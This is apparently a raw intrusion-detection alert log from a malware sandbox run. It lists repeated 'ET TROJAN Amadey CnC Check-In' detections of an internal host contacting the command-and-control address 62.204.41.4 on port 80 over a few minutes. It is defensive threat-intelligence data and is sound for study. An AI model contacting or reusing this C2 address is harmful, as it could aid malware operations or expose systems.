192.168.2.662.204.41.449884802027700 02/07/23-20:01:35.347764	TCP	2027700	ET TROJAN Amadey CnC Check-In	49884	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449921802027700 02/07/23-20:01:45.051140	TCP	2027700	ET TROJAN Amadey CnC Check-In	49921	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450421802027700 02/07/23-20:04:04.274057	TCP	2027700	ET TROJAN Amadey CnC Check-In	50421	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449798802027700 02/07/23-20:01:12.233155	TCP	2027700	ET TROJAN Amadey CnC Check-In	49798	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450127802027700 02/07/23-20:02:47.079664	TCP	2027700	ET TROJAN Amadey CnC Check-In	50127	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450454802027700 02/07/23-20:04:12.348170	TCP	2027700	ET TROJAN Amadey CnC Check-In	50454	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450102802027700 02/07/23-20:02:40.427300	TCP	2027700	ET TROJAN Amadey CnC Check-In	50102	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450200802027700 02/07/23-20:03:07.560016	TCP	2027700	ET TROJAN Amadey CnC Check-In	50200	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450356802027700 02/07/23-20:03:48.331429	TCP	2027700	ET TROJAN Amadey CnC Check-In	50356	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449737802027700 02/07/23-20:00:55.466122	TCP	2027700	ET TROJAN Amadey CnC Check-In	49737	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449835802027700 02/07/23-20:01:20.965850	TCP	2027700	ET TROJAN Amadey CnC Check-In	49835	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450163802027700 02/07/23-20:02:58.736661	TCP	2027700	ET TROJAN Amadey CnC Check-In	50163	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450418802027700 02/07/23-20:04:03.565176	TCP	2027700	ET TROJAN Amadey CnC Check-In	50418	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449918802027700 02/07/23-20:01:43.801204	TCP	2027700	ET TROJAN Amadey CnC Check-In	49918	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450098802027700 02/07/23-20:02:39.366201	TCP	2027700	ET TROJAN Amadey CnC Check-In	50098	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450282802027700 02/07/23-20:03:30.132022	TCP	2027700	ET TROJAN Amadey CnC Check-In	50282	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450348802027700 02/07/23-20:03:46.349889	TCP	2027700	ET TROJAN Amadey CnC Check-In	50348	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449830802027700 02/07/23-20:01:19.753947	TCP	2027700	ET TROJAN Amadey CnC Check-In	49830	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450218802027700 02/07/23-20:03:11.936212	TCP	2027700	ET TROJAN Amadey CnC Check-In	50218	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449954802027700 02/07/23-20:01:56.265159	TCP	2027700	ET TROJAN Amadey CnC Check-In	49954	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450135802027700 02/07/23-20:02:51.914333	TCP	2027700	ET TROJAN Amadey CnC Check-In	50135	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450389802027700 02/07/23-20:03:56.428558	TCP	2027700	ET TROJAN Amadey CnC Check-In	50389	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450057802027700 02/07/23-20:02:25.359863	TCP	2027700	ET TROJAN Amadey CnC Check-In	50057	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449729802027700 02/07/23-20:00:53.543429	TCP	2027700	ET TROJAN Amadey CnC Check-In	49729	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450213802027700 02/07/23-20:03:10.733288	TCP	2027700	ET TROJAN Amadey CnC Check-In	50213	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450029802027700 02/07/23-20:02:18.139693	TCP	2027700	ET TROJAN Amadey CnC Check-In	50029	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450467802027700 02/07/23-20:04:15.494809	TCP	2027700	ET TROJAN Amadey CnC Check-In	50467	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450176802027700 02/07/23-20:03:01.908838	TCP	2027700	ET TROJAN Amadey CnC Check-In	50176	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450093802027700 02/07/23-20:02:38.122439	TCP	2027700	ET TROJAN Amadey CnC Check-In	50093	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449926802027700 02/07/23-20:01:49.382340	TCP	2027700	ET TROJAN Amadey CnC Check-In	49926	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449802802027700 02/07/23-20:01:13.174021	TCP	2027700	ET TROJAN Amadey CnC Check-In	49802	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450130802027700 02/07/23-20:02:48.878883	TCP	2027700	ET TROJAN Amadey CnC Check-In	50130	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450384802027700 02/07/23-20:03:55.223735	TCP	2027700	ET TROJAN Amadey CnC Check-In	50384	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449765802027700 02/07/23-20:01:02.096121	TCP	2027700	ET TROJAN Amadey CnC Check-In	49765	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450426802027700 02/07/23-20:04:05.502601	TCP	2027700	ET TROJAN Amadey CnC Check-In	50426	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449807802027700 02/07/23-20:01:14.403500	TCP	2027700	ET TROJAN Amadey CnC Check-In	49807	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450000802027700 02/07/23-20:02:10.893167	TCP	2027700	ET TROJAN Amadey CnC Check-In	50000	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450254802027700 02/07/23-20:03:20.750307	TCP	2027700	ET TROJAN Amadey CnC Check-In	50254	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449848802027700 02/07/23-20:01:24.096025	TCP	2027700	ET TROJAN Amadey CnC Check-In	49848	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449889802027700 02/07/23-20:01:36.602318	TCP	2027700	ET TROJAN Amadey CnC Check-In	49889	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450278802027700 02/07/23-20:03:29.144513	TCP	2027700	ET TROJAN Amadey CnC Check-In	50278	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450024802027700 02/07/23-20:02:16.923135	TCP	2027700	ET TROJAN Amadey CnC Check-In	50024	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449990802027700 02/07/23-20:02:05.389458	TCP	2027700	ET TROJAN Amadey CnC Check-In	49990	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450085802027700 02/07/23-20:02:35.926262	TCP	2027700	ET TROJAN Amadey CnC Check-In	50085	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450183802027700 02/07/23-20:03:03.375286	TCP	2027700	ET TROJAN Amadey CnC Check-In	50183	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450281802027700 02/07/23-20:03:29.880685	TCP	2027700	ET TROJAN Amadey CnC Check-In	50281	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450094802027700 02/07/23-20:02:38.377724	TCP	2027700	ET TROJAN Amadey CnC Check-In	50094	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450447802027700 02/07/23-20:04:10.628545	TCP	2027700	ET TROJAN Amadey CnC Check-In	50447	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450192802027700 02/07/23-20:03:05.567549	TCP	2027700	ET TROJAN Amadey CnC Check-In	50192	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450349802027700 02/07/23-20:03:46.609528	TCP	2027700	ET TROJAN Amadey CnC Check-In	50349	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450419802027700 02/07/23-20:04:03.800341	TCP	2027700	ET TROJAN Amadey CnC Check-In	50419	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450422802027700 02/07/23-20:04:04.527765	TCP	2027700	ET TROJAN Amadey CnC Check-In	50422	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449803802027700 02/07/23-20:01:13.424990	TCP	2027700	ET TROJAN Amadey CnC Check-In	49803	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449901802027700 02/07/23-20:01:39.612533	TCP	2027700	ET TROJAN Amadey CnC Check-In	49901	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450324802027700 02/07/23-20:03:40.470050	TCP	2027700	ET TROJAN Amadey CnC Check-In	50324	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450189802027700 02/07/23-20:03:04.831775	TCP	2027700	ET TROJAN Amadey CnC Check-In	50189	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450413802027700 02/07/23-20:04:02.323273	TCP	2027700	ET TROJAN Amadey CnC Check-In	50413	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449959802027700 02/07/23-20:01:57.490225	TCP	2027700	ET TROJAN Amadey CnC Check-In	49959	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449793802027700 02/07/23-20:01:11.030637	TCP	2027700	ET TROJAN Amadey CnC Check-In	49793	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450221802027700 02/07/23-20:03:12.688306	TCP	2027700	ET TROJAN Amadey CnC Check-In	50221	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449732802027700 02/07/23-20:00:54.261632	TCP	2027700	ET TROJAN Amadey CnC Check-In	49732	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449986802027700 02/07/23-20:02:03.914624	TCP	2027700	ET TROJAN Amadey CnC Check-In	49986	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450351802027700 02/07/23-20:03:47.097069	TCP	2027700	ET TROJAN Amadey CnC Check-In	50351	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450155802027700 02/07/23-20:02:56.813184	TCP	2027700	ET TROJAN Amadey CnC Check-In	50155	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450380802027700 02/07/23-20:03:54.222459	TCP	2027700	ET TROJAN Amadey CnC Check-In	50380	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449897802027700 02/07/23-20:01:38.564289	TCP	2027700	ET TROJAN Amadey CnC Check-In	49897	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449856802027700 02/07/23-20:01:28.475142	TCP	2027700	ET TROJAN Amadey CnC Check-In	49856	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450114802027700 02/07/23-20:02:43.402147	TCP	2027700	ET TROJAN Amadey CnC Check-In	50114	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450310802027700 02/07/23-20:03:37.027404	TCP	2027700	ET TROJAN Amadey CnC Check-In	50310	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450368802027700 02/07/23-20:03:51.253026	TCP	2027700	ET TROJAN Amadey CnC Check-In	50368	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450025802027700 02/07/23-20:02:17.165507	TCP	2027700	ET TROJAN Amadey CnC Check-In	50025	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450066802027700 02/07/23-20:02:30.943302	TCP	2027700	ET TROJAN Amadey CnC Check-In	50066	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450262802027700 02/07/23-20:03:23.849061	TCP	2027700	ET TROJAN Amadey CnC Check-In	50262	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450279802027700 02/07/23-20:03:29.390956	TCP	2027700	ET TROJAN Amadey CnC Check-In	50279	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450475802027700 02/07/23-20:04:17.464492	TCP	2027700	ET TROJAN Amadey CnC Check-In	50475	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449917802027700 02/07/23-20:01:43.562458	TCP	2027700	ET TROJAN Amadey CnC Check-In	49917	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449822802027700 02/07/23-20:01:17.781118	TCP	2027700	ET TROJAN Amadey CnC Check-In	49822	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449958802027700 02/07/23-20:01:57.237616	TCP	2027700	ET TROJAN Amadey CnC Check-In	49958	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450209802027700 02/07/23-20:03:09.736543	TCP	2027700	ET TROJAN Amadey CnC Check-In	50209	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449828802027700 02/07/23-20:01:19.281463	TCP	2027700	ET TROJAN Amadey CnC Check-In	49828	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449733802027700 02/07/23-20:00:54.497423	TCP	2027700	ET TROJAN Amadey CnC Check-In	49733	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449863802027700 02/07/23-20:01:30.373662	TCP	2027700	ET TROJAN Amadey CnC Check-In	49863	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450352802027700 02/07/23-20:03:47.357138	TCP	2027700	ET TROJAN Amadey CnC Check-In	50352	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449774802027700 02/07/23-20:01:04.281618	TCP	2027700	ET TROJAN Amadey CnC Check-In	49774	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449987802027700 02/07/23-20:02:04.169864	TCP	2027700	ET TROJAN Amadey CnC Check-In	49987	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450441802027700 02/07/23-20:04:09.174122	TCP	2027700	ET TROJAN Amadey CnC Check-In	50441	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449875802027700 02/07/23-20:01:33.341460	TCP	2027700	ET TROJAN Amadey CnC Check-In	49875	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450142802027700 02/07/23-20:02:53.636957	TCP	2027700	ET TROJAN Amadey CnC Check-In	50142	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449872802027700 02/07/23-20:01:32.599241	TCP	2027700	ET TROJAN Amadey CnC Check-In	49872	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449777802027700 02/07/23-20:01:04.763085	TCP	2027700	ET TROJAN Amadey CnC Check-In	49777	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450240802027700 02/07/23-20:03:17.295970	TCP	2027700	ET TROJAN Amadey CnC Check-In	50240	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450396802027700 02/07/23-20:03:58.143968	TCP	2027700	ET TROJAN Amadey CnC Check-In	50396	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449780802027700 02/07/23-20:01:05.481040	TCP	2027700	ET TROJAN Amadey CnC Check-In	49780	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450139802027700 02/07/23-20:02:52.924797	TCP	2027700	ET TROJAN Amadey CnC Check-In	50139	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449869802027700 02/07/23-20:01:31.842864	TCP	2027700	ET TROJAN Amadey CnC Check-In	49869	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449786802027700 02/07/23-20:01:08.155419	TCP	2027700	ET TROJAN Amadey CnC Check-In	49786	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450323802027700 02/07/23-20:03:40.235917	TCP	2027700	ET TROJAN Amadey CnC Check-In	50323	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450151802027700 02/07/23-20:02:55.858238	TCP	2027700	ET TROJAN Amadey CnC Check-In	50151	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450225802027700 02/07/23-20:03:13.640810	TCP	2027700	ET TROJAN Amadey CnC Check-In	50225	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450479802027700 02/07/23-20:04:18.422959	TCP	2027700	ET TROJAN Amadey CnC Check-In	50479	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450053802027700 02/07/23-20:02:24.008849	TCP	2027700	ET TROJAN Amadey CnC Check-In	50053	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450136802027700 02/07/23-20:02:52.154928	TCP	2027700	ET TROJAN Amadey CnC Check-In	50136	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450234802027700 02/07/23-20:03:15.828144	TCP	2027700	ET TROJAN Amadey CnC Check-In	50234	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450081802027700 02/07/23-20:02:34.618171	TCP	2027700	ET TROJAN Amadey CnC Check-In	50081	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449933802027700 02/07/23-20:01:51.094138	TCP	2027700	ET TROJAN Amadey CnC Check-In	49933	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449749802027700 02/07/23-20:00:58.376848	TCP	2027700	ET TROJAN Amadey CnC Check-In	49749	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449942802027700 02/07/23-20:01:53.287894	TCP	2027700	ET TROJAN Amadey CnC Check-In	49942	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450463802027700 02/07/23-20:04:14.491803	TCP	2027700	ET TROJAN Amadey CnC Check-In	50463	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449847802027700 02/07/23-20:01:23.854308	TCP	2027700	ET TROJAN Amadey CnC Check-In	49847	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449844802027700 02/07/23-20:01:23.138925	TCP	2027700	ET TROJAN Amadey CnC Check-In	49844	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449761802027700 02/07/23-20:01:01.073822	TCP	2027700	ET TROJAN Amadey CnC Check-In	49761	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450253802027700 02/07/23-20:03:20.519825	TCP	2027700	ET TROJAN Amadey CnC Check-In	50253	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449891802027700 02/07/23-20:01:37.097124	TCP	2027700	ET TROJAN Amadey CnC Check-In	49891	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449850802027700 02/07/23-20:01:24.592099	TCP	2027700	ET TROJAN Amadey CnC Check-In	49850	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449888802027700 02/07/23-20:01:36.353710	TCP	2027700	ET TROJAN Amadey CnC Check-In	49888	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450069802027700 02/07/23-20:02:31.730232	TCP	2027700	ET TROJAN Amadey CnC Check-In	50069	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449799802027700 02/07/23-20:01:12.467161	TCP	2027700	ET TROJAN Amadey CnC Check-In	49799	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449758802027700 02/07/23-20:01:00.586842	TCP	2027700	ET TROJAN Amadey CnC Check-In	49758	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450040802027700 02/07/23-20:02:20.818780	TCP	2027700	ET TROJAN Amadey CnC Check-In	50040	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450170802027700 02/07/23-20:03:00.433375	TCP	2027700	ET TROJAN Amadey CnC Check-In	50170	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450294802027700 02/07/23-20:03:33.100245	TCP	2027700	ET TROJAN Amadey CnC Check-In	50294	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450212802027700 02/07/23-20:03:10.483511	TCP	2027700	ET TROJAN Amadey CnC Check-In	50212	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450466802027700 02/07/23-20:04:15.238349	TCP	2027700	ET TROJAN Amadey CnC Check-In	50466	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450164802027700 02/07/23-20:02:58.984888	TCP	2027700	ET TROJAN Amadey CnC Check-In	50164	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450377802027700 02/07/23-20:03:53.490589	TCP	2027700	ET TROJAN Amadey CnC Check-In	50377	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450123802027700 02/07/23-20:02:45.637795	TCP	2027700	ET TROJAN Amadey CnC Check-In	50123	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450308802027700 02/07/23-20:03:36.533930	TCP	2027700	ET TROJAN Amadey CnC Check-In	50308	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450336802027700 02/07/23-20:03:43.422466	TCP	2027700	ET TROJAN Amadey CnC Check-In	50336	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450206802027700 02/07/23-20:03:08.986816	TCP	2027700	ET TROJAN Amadey CnC Check-In	50206	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450438802027700 02/07/23-20:04:08.447686	TCP	2027700	ET TROJAN Amadey CnC Check-In	50438	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449819802027700 02/07/23-20:01:17.050746	TCP	2027700	ET TROJAN Amadey CnC Check-In	49819	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449920802027700 02/07/23-20:01:44.690559	TCP	2027700	ET TROJAN Amadey CnC Check-In	49920	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449831802027700 02/07/23-20:01:19.998060	TCP	2027700	ET TROJAN Amadey CnC Check-In	49831	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450450802027700 02/07/23-20:04:11.381589	TCP	2027700	ET TROJAN Amadey CnC Check-In	50450	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449961802027700 02/07/23-20:01:57.956540	TCP	2027700	ET TROJAN Amadey CnC Check-In	49961	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449914802027700 02/07/23-20:01:42.801957	TCP	2027700	ET TROJAN Amadey CnC Check-In	49914	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450116802027700 02/07/23-20:02:43.899561	TCP	2027700	ET TROJAN Amadey CnC Check-In	50116	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450468802027700 02/07/23-20:04:15.743631	TCP	2027700	ET TROJAN Amadey CnC Check-In	50468	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449849802027700 02/07/23-20:01:24.342359	TCP	2027700	ET TROJAN Amadey CnC Check-In	49849	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449754802027700 02/07/23-20:00:59.616651	TCP	2027700	ET TROJAN Amadey CnC Check-In	49754	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450407802027700 02/07/23-20:04:00.848990	TCP	2027700	ET TROJAN Amadey CnC Check-In	50407	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449950802027700 02/07/23-20:01:55.313521	TCP	2027700	ET TROJAN Amadey CnC Check-In	49950	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450101802027700 02/07/23-20:02:40.156173	TCP	2027700	ET TROJAN Amadey CnC Check-In	50101	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450257802027700 02/07/23-20:03:21.461331	TCP	2027700	ET TROJAN Amadey CnC Check-In	50257	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450373802027700 02/07/23-20:03:52.533129	TCP	2027700	ET TROJAN Amadey CnC Check-In	50373	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450021802027700 02/07/23-20:02:16.175026	TCP	2027700	ET TROJAN Amadey CnC Check-In	50021	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450079802027700 02/07/23-20:02:34.128936	TCP	2027700	ET TROJAN Amadey CnC Check-In	50079	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449867802027700 02/07/23-20:01:31.342486	TCP	2027700	ET TROJAN Amadey CnC Check-In	49867	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450195802027700 02/07/23-20:03:06.319605	TCP	2027700	ET TROJAN Amadey CnC Check-In	50195	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449904802027700 02/07/23-20:01:40.346551	TCP	2027700	ET TROJAN Amadey CnC Check-In	49904	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450229802027700 02/07/23-20:03:14.593388	TCP	2027700	ET TROJAN Amadey CnC Check-In	50229	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450391802027700 02/07/23-20:03:56.919310	TCP	2027700	ET TROJAN Amadey CnC Check-In	50391	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449782802027700 02/07/23-20:01:06.291221	TCP	2027700	ET TROJAN Amadey CnC Check-In	49782	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450312802027700 02/07/23-20:03:37.521186	TCP	2027700	ET TROJAN Amadey CnC Check-In	50312	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449960802027700 02/07/23-20:01:57.722505	TCP	2027700	ET TROJAN Amadey CnC Check-In	49960	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449885802027700 02/07/23-20:01:35.593496	TCP	2027700	ET TROJAN Amadey CnC Check-In	49885	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450330802027700 02/07/23-20:03:41.942562	TCP	2027700	ET TROJAN Amadey CnC Check-In	50330	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449983802027700 02/07/23-20:02:03.190207	TCP	2027700	ET TROJAN Amadey CnC Check-In	49983	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450134802027700 02/07/23-20:02:51.667516	TCP	2027700	ET TROJAN Amadey CnC Check-In	50134	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450190802027700 02/07/23-20:03:05.082669	TCP	2027700	ET TROJAN Amadey CnC Check-In	50190	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450285802027700 02/07/23-20:03:30.859758	TCP	2027700	ET TROJAN Amadey CnC Check-In	50285	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449922802027700 02/07/23-20:01:45.348252	TCP	2027700	ET TROJAN Amadey CnC Check-In	49922	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450126802027700 02/07/23-20:02:46.754869	TCP	2027700	ET TROJAN Amadey CnC Check-In	50126	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449726802027700 02/07/23-20:00:52.825969	TCP	2027700	ET TROJAN Amadey CnC Check-In	49726	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449839802027700 02/07/23-20:01:21.949196	TCP	2027700	ET TROJAN Amadey CnC Check-In	49839	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450089802027700 02/07/23-20:02:37.027588	TCP	2027700	ET TROJAN Amadey CnC Check-In	50089	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450167802027700 02/07/23-20:02:59.715669	TCP	2027700	ET TROJAN Amadey CnC Check-In	50167	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450322802027700 02/07/23-20:03:39.988883	TCP	2027700	ET TROJAN Amadey CnC Check-In	50322	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449744802027700 02/07/23-20:00:57.142500	TCP	2027700	ET TROJAN Amadey CnC Check-In	49744	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450363802027700 02/07/23-20:03:50.032689	TCP	2027700	ET TROJAN Amadey CnC Check-In	50363	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450345802027700 02/07/23-20:03:45.626091	TCP	2027700	ET TROJAN Amadey CnC Check-In	50345	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449940802027700 02/07/23-20:01:52.794804	TCP	2027700	ET TROJAN Amadey CnC Check-In	49940	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450304802027700 02/07/23-20:03:35.546383	TCP	2027700	ET TROJAN Amadey CnC Check-In	50304	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450340802027700 02/07/23-20:03:44.394522	TCP	2027700	ET TROJAN Amadey CnC Check-In	50340	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450185802027700 02/07/23-20:03:03.865291	TCP	2027700	ET TROJAN Amadey CnC Check-In	50185	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449721802027700 02/07/23-20:00:51.504071	TCP	2027700	ET TROJAN Amadey CnC Check-In	49721	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450144802027700 02/07/23-20:02:54.112124	TCP	2027700	ET TROJAN Amadey CnC Check-In	50144	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450476802027700 02/07/23-20:04:17.709098	TCP	2027700	ET TROJAN Amadey CnC Check-In	50476	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450435802027700 02/07/23-20:04:07.721879	TCP	2027700	ET TROJAN Amadey CnC Check-In	50435	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450239802027700 02/07/23-20:03:17.051311	TCP	2027700	ET TROJAN Amadey CnC Check-In	50239	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450180802027700 02/07/23-20:03:02.871686	TCP	2027700	ET TROJAN Amadey CnC Check-In	50180	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449792802027700 02/07/23-20:01:10.777922	TCP	2027700	ET TROJAN Amadey CnC Check-In	49792	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450381802027700 02/07/23-20:03:54.458167	TCP	2027700	ET TROJAN Amadey CnC Check-In	50381	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449816802027700 02/07/23-20:01:16.328216	TCP	2027700	ET TROJAN Amadey CnC Check-In	49816	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449970802027700 02/07/23-20:02:00.209993	TCP	2027700	ET TROJAN Amadey CnC Check-In	49970	80	192.168.2.6	62.204.41.4
